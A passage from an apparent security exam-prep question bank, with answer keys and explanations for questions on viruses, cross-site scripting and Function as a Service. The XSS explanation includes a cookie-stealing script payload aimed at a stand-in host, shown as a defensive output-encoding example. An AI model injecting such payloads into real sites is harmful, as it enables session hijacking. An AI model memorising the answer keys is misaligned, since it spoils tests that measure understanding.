The malware type that attaches to files to replicate is therefore a Virus, making it the correct answer. Viruses represent a foundational concept in malware and remain relevant in modern cybersecurity discussions due to their persistence, ability to propagate, and potential to deliver destructive payloads. Recognizing viruses, understanding their replication mechanisms, and implementing comprehensive defense measures are crucial for maintaining the integrity and security of computing environments.

Question 119:

 Which attack targets web applications by injecting malicious scripts into user inputs?

A) SQL Injection
B) Cross-Site Scripting
C) Man-in-the-Middle
D) Brute-Force

Answer: B

Explanation:

Cross-Site Scripting (XSS) is a type of web application attack where malicious scripts are injected into user input fields or web pages, subsequently executed in the browsers of other users. Unlike SQL Injection, which targets databases directly, XSS exploits the client-side of a web application, enabling attackers to manipulate content, steal session cookies, or redirect users to malicious sites. Man-in-the-Middle attacks intercept communications between two parties, and Brute-Force attacks attempt to guess credentials through repeated trials, but neither involves script injection into web applications.

XSS attacks typically occur when web applications fail to validate or sanitize user input properly. Attackers can embed JavaScript, HTML, or other executable code within input fields, comments, or URL parameters. When other users access the compromised content, the malicious scripts execute within their browsers, allowing attackers to hijack sessions, capture sensitive information, manipulate content, or spread malware. XSS attacks are categorized into several types: stored (persistent), reflected, and DOM-based. Stored XSS occurs when malicious scripts are permanently saved on the server and served to users, reflected XSS happens when input is echoed back immediately without sanitization, and DOM-based XSS manipulates the Document Object Model on the client side without server involvement.

Preventing XSS requires implementing multiple layers of defense. Input validation and output encoding are crucial to ensure that user-submitted data cannot execute as code. Content Security Policies (CSP) restrict the sources from which scripts can execute, reducing the likelihood of exploitation. Web developers should also avoid using unsafe APIs and frameworks that do not automatically escape or sanitize user input. Security testing, code reviews, and penetration testing help identify vulnerabilities before attackers can exploit them.
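
Output encoding, one of the defenses named above, can be as simple as the standard-library call in this sketch; the payload is a classic cookie-theft example.

```python
import html

# Encode user-supplied data before placing it in an HTML page so the
# browser renders it as text rather than executing it as a script.
user_comment = '<script>document.location="https://evil.example/"+document.cookie</script>'
safe = html.escape(user_comment)
page = f"<p>Latest comment: {safe}</p>"
# The payload is now inert markup: &lt;script&gt;... instead of a script tag.
print(page)
```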

XSS attacks are particularly dangerous because they exploit trust between users and web applications. Attackers can impersonate users, steal authentication tokens, or inject fraudulent content into web pages. Education for developers and security awareness programs for organizations complement technical defenses by highlighting the importance of secure coding practices. Browser security features, such as same-origin policies, also limit the potential damage from XSS by isolating scripts to specific domains.

The web application attack that injects scripts into user inputs is therefore Cross-Site Scripting, making it the correct answer. Understanding XSS is critical for web developers, system administrators, and security professionals, as it remains a common and potent attack vector in modern web applications. Proper mitigation reduces data theft, session hijacking, and compromise of user trust.

Question 120:

 Which type of cloud service allows users to run code without managing servers?

A) Infrastructure as a Service
B) Platform as a Service
C) Software as a Service
D) Function as a Service

Answer: D

Explanation:

Function as a Service (FaaS) is a cloud computing model that allows users to deploy and execute code without managing any underlying servers, operating systems, or infrastructure. This serverless model abstracts the entire infrastructure layer, enabling developers to focus solely on the code that performs specific functions in response to events, such as HTTP requests, database updates, or messaging queues. Unlike Infrastructure as a Service (IaaS), where users manage virtual machines, operating systems, and applications, or Platform as a Service (PaaS), which handles runtime environments but still requires some deployment configuration, FaaS completely offloads infrastructure management to the cloud provider. Software as a Service (SaaS) delivers fully managed applications, but it does not allow users to deploy custom code directly.

FaaS platforms automatically scale functions based on demand, ensuring optimal resource utilization and cost efficiency. Users are typically billed based on execution time and resource usage rather than pre-provisioned infrastructure, reducing operational costs. Functions are stateless, meaning they do not persist data between executions, which promotes modularity and supports microservices architectures. This model is particularly well-suited for event-driven applications, automation scripts, real-time processing, and API-driven workflows. Providers like AWS Lambda, Azure Functions, and Google Cloud Functions exemplify FaaS platforms that facilitate rapid deployment and maintenance-free code execution.
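
A minimal function in the AWS Lambda style looks like the sketch below; the event shape is an assumption for illustration, and the provider supplies the servers, scaling, and runtime around it.

```python
import json

# Minimal sketch of an event-driven function in the AWS Lambda style.
# The event structure shown is an assumed example, not a fixed schema.

def handler(event, context):
    # A stateless function: everything it needs arrives in the event.
    name = event.get("queryStringParameters", {}).get("name", "world")
    return {
        "statusCode": 200,
        "body": json.dumps({"message": f"hello, {name}"}),
    }
```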

Security in FaaS environments shifts responsibility to the provider for the underlying infrastructure, runtime, and patching. Users focus on secure coding practices, including input validation, authentication, and data handling. Serverless applications benefit from automatic updates and isolation between functions, but developers must consider vulnerabilities related to third-party libraries, function chaining, and event triggers. Monitoring and logging functions are critical for detecting anomalies and performance issues, as traditional infrastructure-level monitoring is abstracted away.

The FaaS model supports agility, rapid prototyping, and microservices adoption. Organizations can release new features faster, respond to changing demands, and minimize overhead associated with server management. However, FaaS requires careful design regarding cold starts, resource limits, and stateless function management to ensure performance and reliability. Best practices include breaking applications into discrete, event-driven functions, securing function triggers, and implementing retry or error handling mechanisms to ensure resilience.

The cloud service model that allows execution of code without managing servers is therefore Function as a Service, making it the correct answer. FaaS represents the evolution of serverless computing, offering developers and organizations a highly efficient, scalable, and cost-effective method to deploy applications while offloading infrastructure responsibilities to cloud providers.